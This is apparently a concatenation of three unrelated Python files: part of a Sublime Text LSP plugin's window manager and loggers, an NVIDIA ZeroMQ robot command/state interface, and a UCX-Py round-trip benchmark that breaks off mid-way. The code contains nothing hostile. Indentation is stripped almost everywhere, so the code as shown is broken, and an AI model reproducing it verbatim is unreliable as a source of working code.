raise NotImplementedError()
@abstractmethod
def on_session_shutdown_async(self, session: Session) -> None:
raise NotImplementedError()
@abstractmethod
def diagnostics_async(self) -> Iterable[Tuple[SessionBufferProtocol, Sequence[Tuple[Diagnostic, sublime.Region]]]]:
raise NotImplementedError()
@abstractmethod
def diagnostics_intersecting_region_async(
self,
region: sublime.Region
) -> Tuple[Sequence[Tuple[SessionBufferProtocol, Sequence[Diagnostic]]], sublime.Region]:
raise NotImplementedError()
@abstractmethod
def diagnostics_touching_point_async(
self,
pt: int,
max_diagnostic_severity_level: int = DiagnosticSeverity.Hint
) -> Tuple[Sequence[Tuple[SessionBufferProtocol, Sequence[Diagnostic]]], sublime.Region]:
raise NotImplementedError()
def diagnostics_intersecting_async(
self,
region_or_point: Union[sublime.Region, int]
) -> Tuple[Sequence[Tuple[SessionBufferProtocol, Sequence[Diagnostic]]], sublime.Region]:
if isinstance(region_or_point, int):
return self.diagnostics_touching_point_async(region_or_point)
elif region_or_point.empty():
return self.diagnostics_touching_point_async(region_or_point.a)
else:
return self.diagnostics_intersecting_region_async(region_or_point)
@abstractmethod
def on_diagnostics_updated_async(self) -> None:
raise NotImplementedError()
@abstractmethod
def on_code_lens_capability_registered_async(self) -> None:
raise NotImplementedError()
@abstractmethod
def get_language_id(self) -> str:
raise NotImplementedError()
@abstractmethod
def get_uri(self) -> str:
raise NotImplementedError()
@abstractmethod
def do_signature_help_async(self, manual: bool) -> None:
raise NotImplementedError()
@abstractmethod
def navigate_signature_help(self, forward: bool) -> None:
raise NotImplementedError()
@abstractmethod
def on_post_move_window_async(self) -> None:
raise NotImplementedError()
def extract_message(params: Any) -> str:
return params.get("message", "???") if isinstance(params, dict) else "???"
def set_diagnostics_count(view: sublime.View, errors: int, warnings: int) -> None:
try:
key = AbstractViewListener.TOTAL_ERRORS_AND_WARNINGS_STATUS_KEY
if userprefs().show_diagnostics_count_in_view_status:
view.set_status(key, "E: {}, W: {}".format(errors, warnings))
else:
view.erase_status(key)
except Exception:
pass
class WindowManager(Manager):
DIAGNOSTIC_PHANTOM_KEY = "lsp_diagnostic_phantom"
def __init__(
self,
window: sublime.Window,
workspace: ProjectFolders,
configs: WindowConfigManager,
) -> None:
self._window = window
self._configs = configs
self._sessions = WeakSet() # type: WeakSet[Session]
self._workspace = workspace
self._pending_listeners = deque() # type: Deque[AbstractViewListener]
self._listeners = WeakSet() # type: WeakSet[AbstractViewListener]
self._new_listener = None # type: Optional[AbstractViewListener]
self._new_session = None # type: Optional[Session]
self._diagnostic_phantom_set = None # type: Optional[sublime.PhantomSet]
self._panel_code_phantoms = None # type: Optional[sublime.PhantomSet]
self.total_error_count = 0
self.total_warning_count = 0
sublime.set_timeout(functools.partial(self._update_panel_main_thread, _NO_DIAGNOSTICS_PLACEHOLDER, []))
def get_config_manager(self) -> WindowConfigManager:
return self._configs
def on_load_project_async(self) -> None:
self.update_workspace_folders_async()
self._configs.update()
def on_post_save_project_async(self) -> None:
self.on_load_project_async()
def update_workspace_folders_async(self) -> None:
if self._workspace.update():
workspace_folders = self._workspace.get_workspace_folders()
for session in self._sessions:
session.update_folders(workspace_folders)
def enable_config_async(self, config_name: str) -> None:
self._configs.enable_config(config_name)
def disable_config_async(self, config_name: str) -> None:
self._configs.disable_config(config_name)
def open_location_async(
self,
location: Location,
session_name: Optional[str],
view: sublime.View,
flags: int = 0,
group: int = -1
) -> Promise[bool]:
for session in self.sessions(view):
if session_name is None or session_name == session.config.name:
return session.open_location_async(location, flags, group)
return Promise.resolve(False)
def register_listener_async(self, listener: AbstractViewListener) -> None:
set_diagnostics_count(listener.view, self.total_error_count, self.total_warning_count)
        # Update workspace folders in case the user has changed them since the window was created.
        # There is currently no notification in ST that reports such folder changes.
self.update_workspace_folders_async()
self._pending_listeners.appendleft(listener)
if self._new_listener is None:
self._dequeue_listener_async()
def unregister_listener_async(self, listener: AbstractViewListener) -> None:
self._listeners.discard(listener)
def listeners(self) -> Generator[AbstractViewListener, None, None]:
yield from self._listeners
def listener_for_view(self, view: sublime.View) -> Optional[AbstractViewListener]:
for listener in self.listeners():
if listener.view == view:
return listener
return None
def _dequeue_listener_async(self) -> None:
listener = None # type: Optional[AbstractViewListener]
if self._new_listener is not None:
listener = self._new_listener
# debug("re-checking listener", listener)
self._new_listener = None
else:
try:
listener = self._pending_listeners.pop()
if not listener.view.is_valid():
# debug("listener", listener, "is no longer valid")
return self._dequeue_listener_async()
# debug("adding new pending listener", listener)
self._listeners.add(listener)
except IndexError:
# We have handled all pending listeners.
self._new_session = None
return
if self._new_session:
self._sessions.add(self._new_session)
self._publish_sessions_to_listener_async(listener)
if self._new_session:
if not any(self._new_session.session_views_async()):
self._sessions.discard(self._new_session)
self._new_session.end_async()
self._new_session = None
config = self._needed_config(listener.view)
if config:
# debug("found new config for listener", listener)
self._new_listener = listener
self.start_async(config, listener.view)
else:
# debug("no new config found for listener", listener)
self._new_listener = None
self._dequeue_listener_async()
def _publish_sessions_to_listener_async(self, listener: AbstractViewListener) -> None:
inside_workspace = self._workspace.contains(listener.view)
scheme = urllib.parse.urlparse(listener.get_uri()).scheme
for session in self._sessions:
if session.can_handle(listener.view, scheme, capability=None, inside_workspace=inside_workspace):
# debug("registering session", session.config.name, "to listener", listener)
try:
listener.on_session_initialized_async(session)
except Exception as ex:
message = "failed to register session {} to listener {}".format(session.config.name, listener)
exception_log(message, ex)
def window(self) -> sublime.Window:
return self._window
def sessions(self, view: sublime.View, capability: Optional[str] = None) -> Generator[Session, None, None]:
inside_workspace = self._workspace.contains(view)
sessions = list(self._sessions)
uri = view.settings().get("lsp_uri")
if not isinstance(uri, str):
return
scheme = urllib.parse.urlparse(uri).scheme
for session in sessions:
if session.can_handle(view, scheme, capability, inside_workspace):
yield session
def get_session(self, config_name: str, file_path: str) -> Optional[Session]:
return self._find_session(config_name, file_path)
def _can_start_config(self, config_name: str, file_path: str) -> bool:
return not bool(self._find_session(config_name, file_path))
def _find_session(self, config_name: str, file_path: str) -> Optional[Session]:
inside = self._workspace.contains(file_path)
for session in self._sessions:
if session.config.name == config_name and session.handles_path(file_path, inside):
return session
return None
def _needed_config(self, view: sublime.View) -> Optional[ClientConfig]:
configs = self._configs.match_view(view)
handled = False
file_name = view.file_name()
inside = self._workspace.contains(view)
for config in configs:
handled = False
for session in self._sessions:
if config.name == session.config.name and session.handles_path(file_name, inside):
handled = True
break
if not handled:
return config
return None
def start_async(self, config: ClientConfig, initiating_view: sublime.View) -> None:
config = ClientConfig.from_config(config, {})
file_path = initiating_view.file_name() or ''
if not self._can_start_config(config.name, file_path):
# debug('Already starting on this window:', config.name)
return
try:
workspace_folders = sorted_workspace_folders(self._workspace.folders, file_path)
plugin_class = get_plugin(config.name)
variables = extract_variables(self._window)
cwd = None # type: Optional[str]
if plugin_class is not None:
if plugin_class.needs_update_or_installation():
config.set_view_status(initiating_view, "installing...")
plugin_class.install_or_update()
additional_variables = plugin_class.additional_variables()
if isinstance(additional_variables, dict):
variables.update(additional_variables)
cannot_start_reason = plugin_class.can_start(self._window, initiating_view, workspace_folders, config)
if cannot_start_reason:
config.erase_view_status(initiating_view)
message = "cannot start {}: {}".format(config.name, cannot_start_reason)
self._configs.disable_config(config.name, only_for_session=True)
# Continue with handling pending listeners
self._new_session = None
sublime.set_timeout_async(self._dequeue_listener_async)
return self._window.status_message(message)
cwd = plugin_class.on_pre_start(self._window, initiating_view, workspace_folders, config)
config.set_view_status(initiating_view, "starting...")
session = Session(self, self._create_logger(config.name), workspace_folders, config, plugin_class)
if cwd:
transport_cwd = cwd # type: Optional[str]
else:
transport_cwd = workspace_folders[0].path if workspace_folders else None
transport_config = config.resolve_transport_config(variables)
transport = create_transport(transport_config, transport_cwd, session)
if plugin_class:
plugin_class.on_post_start(self._window, initiating_view, workspace_folders, config)
config.set_view_status(initiating_view, "initialize")
session.initialize_async(
variables=variables,
transport=transport,
working_directory=cwd,
init_callback=functools.partial(self._on_post_session_initialize, initiating_view)
)
self._new_session = session
except Exception as e:
message = "".join((
"Failed to start {0} - disabling for this window for the duration of the current session.\n",
"Re-enable by running \"LSP: Enable Language Server In Project\" from the Command Palette.",
"\n\n--- Error: ---\n{1}"
)).format(config.name, str(e))
exception_log("Unable to start subprocess for {}".format(config.name), e)
if isinstance(e, CalledProcessError):
print("Server output:\n{}".format(e.output.decode('utf-8', 'replace')))
self._configs.disable_config(config.name, only_for_session=True)
config.erase_view_status(initiating_view)
sublime.message_dialog(message)
# Continue with handling pending listeners
self._new_session = None
sublime.set_timeout_async(self._dequeue_listener_async)
def _on_post_session_initialize(
self, initiating_view: sublime.View, session: Session, is_error: bool = False
) -> None:
if is_error:
session.config.erase_view_status(initiating_view)
self._new_listener = None
self._new_session = None
else:
sublime.set_timeout_async(self._dequeue_listener_async)
def _create_logger(self, config_name: str) -> Logger:
logger_map = {
"panel": PanelLogger,
"remote": RemoteLogger,
}
loggers = []
for logger_type in userprefs().log_server:
if logger_type not in logger_map:
debug("Invalid logger type ({}) specified for log_server settings".format(logger_type))
continue
loggers.append(logger_map[logger_type])
if len(loggers) == 0:
return RouterLogger() # logs nothing
elif len(loggers) == 1:
return loggers[0](self, config_name)
else:
router_logger = RouterLogger()
for logger in loggers:
router_logger.append(logger(self, config_name))
return router_logger
def handle_message_request(self, session: Session, params: Any, request_id: Any) -> None:
view = self._window.active_view()
if view:
MessageRequestHandler(view, session, request_id, params, session.config.name).show()
def restart_sessions_async(self) -> None:
self._end_sessions_async()
listeners = list(self._listeners)
self._listeners.clear()
for listener in listeners:
self.register_listener_async(listener)
def _end_sessions_async(self) -> None:
for session in self._sessions:
session.end_async()
self._sessions.clear()
def end_config_sessions_async(self, config_name: str) -> None:
sessions = list(self._sessions)
for session in sessions:
if session.config.name == config_name:
session.end_async()
self._sessions.discard(session)
def get_project_path(self, file_path: str) -> Optional[str]:
candidate = None # type: Optional[str]
for folder in self._workspace.folders:
if file_path.startswith(folder):
if candidate is None or len(folder) > len(candidate):
candidate = folder
return candidate
def should_present_diagnostics(self, uri: DocumentUri) -> Optional[str]:
scheme, path = parse_uri(uri)
if scheme != "file":
return None
if not self._workspace.contains(path):
return "not inside window folders"
view = self._window.active_view()
if not view:
return None
settings = view.settings()
if matches_pattern(path, settings.get("binary_file_patterns")):
return "matches a pattern in binary_file_patterns"
if matches_pattern(path, settings.get("file_exclude_patterns")):
return "matches a pattern in file_exclude_patterns"
if matches_pattern(path, settings.get("folder_exclude_patterns")):
return "matches a pattern in folder_exclude_patterns"
return None
def on_post_exit_async(self, session: Session, exit_code: int, exception: Optional[Exception]) -> None:
self._sessions.discard(session)
for listener in self._listeners:
listener.on_session_shutdown_async(session)
if exit_code != 0 or exception:
config = session.config
msg = "".join((
"{0} exited with status code {1}. ",
"Do you want to restart it? If you choose Cancel, it will be disabled for this window for the ",
"duration of the current session. ",
"Re-enable by running \"LSP: Enable Language Server In Project\" from the Command Palette."
)).format(config.name, exit_code)
if exception:
msg += "\n\n--- Error: ---\n{}".format(str(exception))
if sublime.ok_cancel_dialog(msg, "Restart {}".format(config.name)):
for listener in self._listeners:
self.register_listener_async(listener)
else:
self._configs.disable_config(config.name, only_for_session=True)
def plugin_unloaded(self) -> None:
"""
This is called **from the main thread** when the plugin unloads. In that case we must destroy all sessions
from the main thread. That could lead to some dict/list being mutated while iterated over, so be careful
"""
self._end_sessions_async()
def handle_server_message(self, server_name: str, message: str) -> None:
sublime.set_timeout(lambda: log_server_message(self._window, server_name, message))
def handle_log_message(self, session: Session, params: Any) -> None:
self.handle_server_message(session.config.name, extract_message(params))
def handle_stderr_log(self, session: Session, message: str) -> None:
self.handle_server_message(session.config.name, message)
def handle_show_message(self, session: Session, params: Any) -> None:
sublime.status_message("{}: {}".format(session.config.name, extract_message(params)))
def update_diagnostics_panel_async(self) -> None:
to_render = [] # type: List[str]
self.total_error_count = 0
self.total_warning_count = 0
listeners = list(self._listeners)
prephantoms = [] # type: List[Tuple[int, int, str, str]]
row = 0
for session in self._sessions:
local_errors, local_warnings = session.diagnostics_manager.sum_total_errors_and_warnings_async()
self.total_error_count += local_errors
self.total_warning_count += local_warnings
for path, contribution in session.diagnostics_manager.diagnostics_panel_contributions_async():
to_render.append("{}:".format(path))
row += 1
for content, offset, code, href in contribution:
to_render.append(content)
if offset is not None and code is not None and href is not None:
prephantoms.append((row, offset, code, href))
row += content.count("\n") + 1
to_render.append("") # add spacing between filenames
row += 1
for listener in listeners:
set_diagnostics_count(listener.view, self.total_error_count, self.total_warning_count)
characters = "\n".join(to_render)
if not characters:
characters = _NO_DIAGNOSTICS_PLACEHOLDER
sublime.set_timeout(functools.partial(self._update_panel_main_thread, characters, prephantoms))
def _update_panel_main_thread(self, characters: str, prephantoms: List[Tuple[int, int, str, str]]) -> None:
panel = ensure_diagnostics_panel(self._window)
if not panel or not panel.is_valid():
return
panel.run_command("lsp_update_panel", {"characters": characters})
if self._panel_code_phantoms is None:
self._panel_code_phantoms = sublime.PhantomSet(panel, "hrefs")
phantoms = [] # type: List[sublime.Phantom]
for row, col, code, href in prephantoms:
point = panel.text_point(row, col)
region = sublime.Region(point, point)
phantoms.append(sublime.Phantom(region, make_link(href, code), sublime.LAYOUT_INLINE))
self._panel_code_phantoms.update(phantoms)
def show_diagnostics_panel_async(self) -> None:
if self._window.active_panel() is None:
self._window.run_command("show_panel", {"panel": "output.diagnostics"})
class WindowRegistry(object):
def __init__(self, configs: ConfigManager) -> None:
self._windows = {} # type: Dict[int, WindowManager]
self._configs = configs
def lookup(self, window: sublime.Window) -> WindowManager:
wm = self._windows.get(window.id())
if wm:
return wm
workspace = ProjectFolders(window)
window_configs = self._configs.for_window(window)
state = WindowManager(window=window, workspace=workspace, configs=window_configs)
self._windows[window.id()] = state
return state
def listener_for_view(self, view: sublime.View) -> Optional[AbstractViewListener]:
w = view.window()
if not w:
return None
return self.lookup(w).listener_for_view(view)
def discard(self, window: sublime.Window) -> None:
self._windows.pop(window.id(), None)
class PanelLogger(Logger):
def __init__(self, manager: WindowManager, server_name: str) -> None:
self._manager = ref(manager)
self._server_name = server_name
def stderr_message(self, message: str) -> None:
"""
        Not handled here because stderr messages are handled by WindowManager
        regardless of whether this logger is enabled.
"""
pass
def log(self, message: str, params: Any) -> None:
def run_on_async_worker_thread() -> None:
nonlocal message
params_str = str(params)
if 0 < userprefs().log_max_size <= len(params_str):
params_str = '<params with {} characters>'.format(len(params_str))
message = "{}: {}".format(message, params_str)
manager = self._manager()
if manager is not None:
manager.handle_server_message(":", message)
sublime.set_timeout_async(run_on_async_worker_thread)
def outgoing_response(self, request_id: Any, params: Any) -> None:
if not userprefs().log_server:
return
self.log(self._format_response(">>>", request_id), params)
def outgoing_error_response(self, request_id: Any, error: Error) -> None:
if not userprefs().log_server:
return
self.log(self._format_response("~~>", request_id), error.to_lsp())
def outgoing_request(self, request_id: int, method: str, params: Any) -> None:
if not userprefs().log_server:
return
self.log(self._format_request("-->", method, request_id), params)
def outgoing_notification(self, method: str, params: Any) -> None:
if not userprefs().log_server:
return
self.log(self._format_notification(" ->", method), params)
def incoming_response(self, request_id: int, params: Any, is_error: bool) -> None:
if not userprefs().log_server:
return
direction = "<~~" if is_error else "<<<"
self.log(self._format_response(direction, request_id), params)
def incoming_request(self, request_id: Any, method: str, params: Any) -> None:
if not userprefs().log_server:
return
self.log(self._format_request("<--", method, request_id), params)
def incoming_notification(self, method: str, params: Any, unhandled: bool) -> None:
if not userprefs().log_server:
return
direction = "<? " if unhandled else "<- "
self.log(self._format_notification(direction, method), params)
def _format_response(self, direction: str, request_id: Any) -> str:
return "{} {} {}".format(direction, self._server_name, request_id)
def _format_request(self, direction: str, method: str, request_id: Any) -> str:
return "{} {} {}({})".format(direction, self._server_name, method, request_id)
def _format_notification(self, direction: str, method: str) -> str:
return "{} {} {}".format(direction, self._server_name, method)
class RemoteLogger(Logger):
PORT = 9981
DIRECTION_OUTGOING = 1
DIRECTION_INCOMING = 2
_ws_server = None # type: Optional[WebsocketServer]
_ws_server_thread = None # type: Optional[threading.Thread]
_last_id = 0
def __init__(self, manager: WindowManager, server_name: str) -> None:
RemoteLogger._last_id += 1
self._server_name = '{} ({})'.format(server_name, RemoteLogger._last_id)
if not RemoteLogger._ws_server:
try:
RemoteLogger._ws_server = WebsocketServer(self.PORT)
RemoteLogger._ws_server.set_fn_new_client(self._on_new_client)
RemoteLogger._ws_server.set_fn_client_left(self._on_client_left)
RemoteLogger._ws_server.set_fn_message_received(self._on_message_received)
self._start_server()
except OSError as ex:
if ex.errno == 48: # Address already in use
debug('WebsocketServer not started - address already in use')
RemoteLogger._ws_server = None
else:
raise ex
def _start_server(self) -> None:
def start_async() -> None:
if RemoteLogger._ws_server:
RemoteLogger._ws_server.run_forever()
RemoteLogger._ws_server_thread = threading.Thread(target=start_async)
RemoteLogger._ws_server_thread.start()
def _stop_server(self) -> None:
if RemoteLogger._ws_server:
RemoteLogger._ws_server.shutdown()
RemoteLogger._ws_server = None
if RemoteLogger._ws_server_thread:
RemoteLogger._ws_server_thread.join()
RemoteLogger._ws_server_thread = None
def _on_new_client(self, client: Dict, server: WebsocketServer) -> None:
"""Called for every client connecting (after handshake)."""
debug("New client connected and was given id %d" % client['id'])
# server.send_message_to_all("Hey all, a new client has joined us")
def _on_client_left(self, client: Dict, server: WebsocketServer) -> None:
"""Called for every client disconnecting."""
debug("Client(%d) disconnected" % client['id'])
def _on_message_received(self, client: Dict, server: WebsocketServer, message: str) -> None:
"""Called when a client sends a message."""
debug("Client(%d) said: %s" % (client['id'], message))
def stderr_message(self, message: str) -> None:
self._broadcast_json({
'server': self._server_name,
'time': round(time() * 1000),
'method': 'stderr',
'params': message,
'isError': True,
'direction': self.DIRECTION_INCOMING,
})
def outgoing_request(self, request_id: int, method: str, params: Any) -> None:
self._broadcast_json({
'server': self._server_name,
'id': request_id,
'time': round(time() * 1000),
'method': method,
'params': params,
'direction': self.DIRECTION_OUTGOING,
})
def incoming_response(self, request_id: int, params: Any, is_error: bool) -> None:
self._broadcast_json({
'server': self._server_name,
'id': request_id,
'time': round(time() * 1000),
'params': params,
'direction': self.DIRECTION_INCOMING,
'isError': is_error,
})
def incoming_request(self, request_id: Any, method: str, params: Any) -> None:
self._broadcast_json({
'server': self._server_name,
'id': request_id,
'time': round(time() * 1000),
'method': method,
'params': params,
'direction': self.DIRECTION_INCOMING,
})
def outgoing_response(self, request_id: Any, params: Any) -> None:
self._broadcast_json({
'server': self._server_name,
'id': request_id,
'time': round(time() * 1000),
'params': params,
'direction': self.DIRECTION_OUTGOING,
})
def outgoing_error_response(self, request_id: Any, error: Error) -> None:
self._broadcast_json({
'server': self._server_name,
'id': request_id,
'isError': True,
'params': error.to_lsp(),
'time': round(time() * 1000),
'direction': self.DIRECTION_OUTGOING,
})
def outgoing_notification(self, method: str, params: Any) -> None:
self._broadcast_json({
'server': self._server_name,
'time': round(time() * 1000),
'method': method,
'params': params,
'direction': self.DIRECTION_OUTGOING,
})
def incoming_notification(self, method: str, params: Any, unhandled: bool) -> None:
self._broadcast_json({
'server': self._server_name,
'time': round(time() * 1000),
'error': 'Unhandled notification!' if unhandled else None,
'method': method,
'params': params,
'direction': self.DIRECTION_INCOMING,
})
def _broadcast_json(self, data: Dict[str, Any]) -> None:
if RemoteLogger._ws_server:
json_data = json.dumps(data, sort_keys=True, check_circular=False, separators=(',', ':'))
RemoteLogger._ws_server.send_message_to_all(json_data)
class RouterLogger(Logger):
def __init__(self) -> None:
self._loggers = [] # type: List[Logger]
def append(self, logger: Logger) -> None:
self._loggers.append(logger)
def stderr_message(self, *args: Any, **kwargs: Any) -> None:
self._foreach("stderr_message", *args, **kwargs)
def outgoing_response(self, *args: Any, **kwargs: Any) -> None:
self._foreach("outgoing_response", *args, **kwargs)
def outgoing_error_response(self, *args: Any, **kwargs: Any) -> None:
self._foreach("outgoing_error_response", *args, **kwargs)
def outgoing_request(self, *args: Any, **kwargs: Any) -> None:
self._foreach("outgoing_request", *args, **kwargs)
def outgoing_notification(self, *args: Any, **kwargs: Any) -> None:
self._foreach("outgoing_notification", *args, **kwargs)
def incoming_response(self, *args: Any, **kwargs: Any) -> None:
self._foreach("incoming_response", *args, **kwargs)
def incoming_request(self, *args: Any, **kwargs: Any) -> None:
self._foreach("incoming_request", *args, **kwargs)
def incoming_notification(self, *args: Any, **kwargs: Any) -> None:
self._foreach("incoming_notification", *args, **kwargs)
def _foreach(self, method: str, *args: Any, **kwargs: Any) -> None:
for logger in self._loggers:
getattr(logger, method)(*args, **kwargs)
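# Usage sketch (illustrative only, not part of the plugin): this mirrors what
# WindowManager._create_logger builds when both "panel" and "remote" are listed
# in the "log_server" user setting. `manager` is assumed to be an existing
# WindowManager instance and "example-server" is a hypothetical config name.
#
#   router = RouterLogger()
#   router.append(PanelLogger(manager, "example-server"))
#   router.append(RemoteLogger(manager, "example-server"))
#   router.outgoing_notification("textDocument/didSave",
#                                {"textDocument": {"uri": "file:///tmp/example.py"}})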
|
zmq_robot_interface.py
|
#
# MIT License
#
# Copyright (c) 2020-2021 NVIDIA CORPORATION.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
import numpy as np
import time
import zmq
from threading import Thread
def send_array(socket, A, flags=0, copy=True, track=False):
"""send a numpy array with metadata"""
md = dict(
dtype = str(A.dtype),
shape = A.shape,
)
socket.send_json(md, flags|zmq.SNDMORE)
return socket.send(A, flags, copy=copy, track=track)
def recv_array(socket, flags=0, copy=True, track=False):
"""recv a numpy array"""
md = socket.recv_json(flags=flags)
msg = socket.recv(flags=flags, copy=copy, track=track)
buf = memoryview(msg)
A = np.frombuffer(buf, dtype=md['dtype'])
return A.reshape(md['shape'])
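# The two helpers above form a simple two-frame protocol: a JSON metadata frame
# (dtype and shape, sent with zmq.SNDMORE) followed by the raw array bytes.
# A minimal pairing over a REQ/REP socket could look like the sketch below
# (illustrative only; the endpoint address is an assumption, and the snippet is
# kept in comments so importing this module stays side-effect free):
#
#   ctx = zmq.Context()
#   req = ctx.socket(zmq.REQ)
#   req.connect("tcp://127.0.0.1:5555")
#   send_array(req, np.arange(12, dtype="u1").reshape(3, 4))
#   echoed = recv_array(req)  # shape (3, 4), dtype u1, if the peer echoes it back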
class SimComms(object):
def __init__(self, pub_topic='control_traj', sub_topic='robot_state', host='127.0.0.1', pub_port='5001',
sub_port='5002'):
self.dt = 1 / 1000.0
self.done = False
self.context = zmq.Context()
self.pub_socket = self.context.socket(zmq.PUB)
self.pub_socket.bind("tcp://{}:{}".format(host, pub_port))
self.pub_topic = pub_topic
self.sub_socket = self.context.socket(zmq.SUB)
self.sub_socket.setsockopt(zmq.RCVTIMEO, 1000)
self.sub_socket.connect("tcp://{}:{}".format(host, sub_port))
self.sub_topic = sub_topic
self.sub_socket.subscribe(self.sub_topic)
#self.state = None
self.state_message = None
self.state_topic = None
self.pub_array = None
self.t1 = Thread(target=self.thread_fn_sub)
self.t1.start()
self.t2 = Thread(target=self.thread_fn_pub)
self.t2.start()
def thread_fn_sub(self):
while not self.done:
try:
topic = self.sub_socket.recv_string(flags=zmq.NOBLOCK)
except zmq.Again as e:
time.sleep(self.dt)
continue
state = recv_array(self.sub_socket, flags=zmq.NOBLOCK, copy=True, track=False)
if(topic == self.sub_topic):
self.state_message = state
self.state_topic = topic
def thread_fn_pub(self):
#print(self.done)
while(not self.done):
if(self.pub_array is not None):
#print(self.robot_state_pub)
#print(self.pub_topic, self.pub_array)
self.pub_socket.send_string(self.pub_topic, flags=zmq.SNDMORE)
send_array(self.pub_socket,self.pub_array, flags=0, copy=True, track=False)
self.pub_array = None
time.sleep(self.dt)
return True
def close(self):
self.done = True
self.sub_socket.close()
self.pub_socket.close()
self.context.term()
def send_command(self, cmd):
#print("setting command...")
self.pub_array = cmd
#print(self.done)
#print(self.pub_array)
def get_state(self):
state_message = self.state_message
self.state_message = None
return state_message
class RobotInterface(object):
def __init__(self, pub_topic='control_traj', sub_topic='robot_state', host='127.0.0.1', pub_port='5001', sub_port='5002',pair_port='5003'):
self.sub_hz = 500.0
self.pub_topic = pub_topic
self.sub_topic = sub_topic
self.host = host
self.pub_port = pub_port
self.sub_port = sub_port
self.state_topic = sub_topic
self.zmq_comms = SimComms(sub_topic=sub_topic,
pub_topic=pub_topic,
host=host,
sub_port=sub_port,
pub_port=pub_port)
def get_state(self):
#print("waiting on state")
self.state = self.zmq_comms.get_state()
while(self.state is None):
try:
self.state = self.zmq_comms.get_state()
except KeyboardInterrupt:
exit()
self.state = np.ravel(self.state)
if(len(self.state) > 6*3):
state = self.state[:-9]
goal_pose = self.state[-9:-2]
#print(self.state)
t_idx = self.state[-2:-1]
            open_loop = self.state[-1:]  # open-loop flag is the last element of the state vector
else:
state = self.state
goal_pose, t_idx, open_loop = None, None, 0
state_dict = {'robot_state': state,'goal_pose': goal_pose, 't_idx': t_idx, 'open_loop':
bool(open_loop)}
self.state = None
return state_dict
def publish_state(self, state):
pass
def publish_action(self, action_traj, append_time=True,dt=0.1):
num_commands = action_traj.shape[0]
if append_time:
command_times = np.arange(start=0.0,stop=dt*len(action_traj), step=dt).reshape(len(action_traj),1)
#print(command_times)
command = action_traj
if append_time:
command = np.concatenate((command, command_times),axis=-1)
#print(command)
self.zmq_comms.send_command(command)
def publish_command(self, command_state_seq, mode='acc', append_time=True):
num_commands = command_state_seq.shape[0]
        q = np.array(command_state_seq[:, :6])  # TODO: remove hardcoded joint dimension
qd = np.array(command_state_seq[:,6:12])
qdd = np.array(command_state_seq[:, 12:18])
if append_time:
command_times = np.array(command_state_seq[:, -1]).reshape(num_commands,1)
if mode == 'pos':
command = q
elif mode == 'vel':
command = qd
elif mode == 'acc':
command = qdd
elif mode == 'full':
command = command_state_seq
if append_time:
command = np.concatenate((command, command_times),axis=-1)
print('Publishing plan', command.shape)
self.zmq_comms.send_command(command)
def close(self):
#close thread
self.zmq_comms.close()
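# Minimal smoke-test sketch (an assumption, not shipped with this module): it
# expects a simulator publishing numpy state arrays on the 'robot_state' topic
# at sub_port and listening for 'control_traj' commands on pub_port.
# get_state() blocks until the first state message arrives.
if __name__ == '__main__':
    robot = RobotInterface()
    try:
        state_dict = robot.get_state()
        print('robot_state:', state_dict['robot_state'])
        # publish a short zero trajectory with timestamps appended
        robot.publish_action(np.zeros((5, 6)), append_time=True, dt=0.1)
    finally:
        robot.close()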
|
local-send-recv.py
|
"""
Benchmark send receive on one machine
"""
import argparse
import asyncio
import multiprocessing as mp
from time import perf_counter as clock
from distributed.utils import format_bytes, parse_bytes
import numpy
import ucp
mp = mp.get_context("spawn")
def server(queue, args):
ucp.init()
if args.object_type == "numpy":
import numpy as np
else:
import cupy as np
np.cuda.runtime.setDevice(args.server_dev)
async def run():
async def server_handler(ep):
times = []
msg_recv_list = []
if not args.reuse_alloc:
for _ in range(args.n_iter):
msg_recv_list.append(np.zeros(args.n_bytes, dtype="u1"))
else:
t = np.zeros(args.n_bytes, dtype="u1")
for _ in range(args.n_iter):
msg_recv_list.append(t)
assert msg_recv_list[0].nbytes == args.n_bytes
for i in range(args.n_iter):
await ep.recv(msg_recv_list[i], args.n_bytes)
await ep.send(msg_recv_list[i], args.n_bytes)
await ep.close()
lf.close()
lf = ucp.create_listener(server_handler)
queue.put(lf.port)
while not lf.closed():
await asyncio.sleep(0.5)
loop = asyncio.get_event_loop()
loop.run_until_complete(run())
loop.close()
def client(queue, port, args):
import ucp
ucp.init()
if args.object_type == "numpy":
import numpy as np
else:
import cupy as np
np.cuda.runtime.setDevice(args.client_dev)
async def run():
ep = await ucp.create_endpoint(args.server_address, port)
msg_send_list = []
msg_recv_list = []
if not args.reuse_alloc:
for i in range(args.n_iter):
msg_send_list.append(np.arange(args.n_bytes, dtype="u1"))
msg_recv_list.append(np.zeros(args.n_bytes, dtype="u1"))
else:
t1 = np.arange(args.n_bytes, dtype="u1")
t2 = np.zeros(args.n_bytes, dtype="u1")
for i in range(args.n_iter):
msg_send_list.append(t1)
msg_recv_list.append(t2)
assert msg_send_list[0].nbytes == args.n_bytes
assert msg_recv_list[0].nbytes == args.n_bytes
if args.cuda_profile:
np.cuda.profiler.start()
times = []
for i in range(args.n_iter):
start = clock()
await ep.send(msg_send_list[i], args.n_bytes)
await ep.recv(msg_recv_list[i], args.n_bytes)
stop = clock()
times.append(stop - start)
if args.cuda_profile:
np.cuda.profiler.stop()
queue.put(times)
loop = asyncio.get_event_loop()
loop.run_until_complete(run())
loop.close()
def parse_args():
parser = argparse.ArgumentParser(description="Roundtrip benchmark")
parser.add_argument(
"-n",
"--n-bytes",
metavar="BYTES",
default="10 Mb",
type=parse_bytes,
help="Message size. Default '10 Mb'.",
)
parser.add_argument(
"--n-iter",
metavar="N",
default=10,
type=int,
        help="Number of send / recv iterations (default 10).",
)
parser.add_argument(
"-o",
